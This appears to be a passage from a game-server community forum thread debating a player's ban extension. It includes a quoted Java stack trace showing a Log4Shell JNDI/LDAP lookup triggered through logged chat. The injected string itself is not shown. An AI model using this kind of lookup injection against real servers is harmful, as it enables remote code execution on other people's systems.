at com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202)
at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at javax.naming.InitialContext.lookup(InitialContext.java:417)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:188)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:334)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:324)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:209)
at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:58)
at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39)
at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:464)
at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:448)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:431)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:419)
at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:79)
at org.apache.logging.log4j.core.async.AsyncLogger.actualAsyncLog(AsyncLogger.java:381)
at org.apache.logging.log4j.core.async.RingBufferLogEvent.execute(RingBufferLogEvent.java:161)
at org.apache.logging.log4j.core.async.RingBufferLogEventHandler.onEvent(RingBufferLogEventHandler.java:45)
at org.apache.logging.log4j.core.async.RingBufferLogEventHandler.onEvent(RingBufferLogEventHandler.java:29)
at com.lmax.disruptor.BatchEventProcessor.processEvents(BatchEventProcessor.java:168)
at com.lmax.disruptor.BatchEventProcessor.run(BatchEventProcessor.java:125)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.net.UnknownHostException: get_balls
at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:184)
at java.net.PlainSocketImpl.connect(PlainSocketImpl.java:172)
at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)
at java.net.Socket.connect(Socket.java:607)
at java.net.Socket.connect(Socket.java:556)
at java.net.Socket.<init>(Socket.java:452)
at java.net.Socket.<init>(Socket.java:229)
at com.sun.jndi.ldap.Connection.createSocket(Connection.java:380)
at com.sun.jndi.ldap.Connection.<init>(Connection.java:220)
... 39 more
me test test test!
[01:27:37 INFO]: * Server test test test!
Display More
The bottom line is when people attempt to exploit anything on the network, they're banned.
When did I say I was challenging the initial ban? I was challenging your decision to extend Eva's ban from 2 months to 6 months because you backed said decision up by claiming she both maliciously and intentionally tried to abuse a critically dangerous remote code execution exploit with the idea being to disrupt the network or a server within it, which doesn't make sense given a wide variety of reasons which I have previously stated.
Again, the reality is Eva was the 2nd most significant offender based on the number of unique strings they used to connect and number of connections made, it took a substantial amount of time to clean up compared to the one or two entries most other people had. I think it's fair to punish someone more significantly when they were more significantly disruptive.
Actually, that would have actually been a much better justification than what you went with.
Actually, that would have actually been a much better justification than what you went with.
fwiw this isn’t the first instance ryan said this like he’s been saying that from the start but just mainly on Discord
my two cents is that we really need to start cutting down on the long term bans for regular users… to the point where it’s becoming an issue for the playercount. i’ve never been one to complain about shit like that cuz yk being an admin for 5 years I understand the need for bans and shit but when its extending a ban from 2 to 6 months for something that sure is bannable but not like critically serious, i start to question shit
think of the knock on effect too.. if people start to worry everything is bannable then they wont join - especially since from eva’s pov it was just a joke gone wrong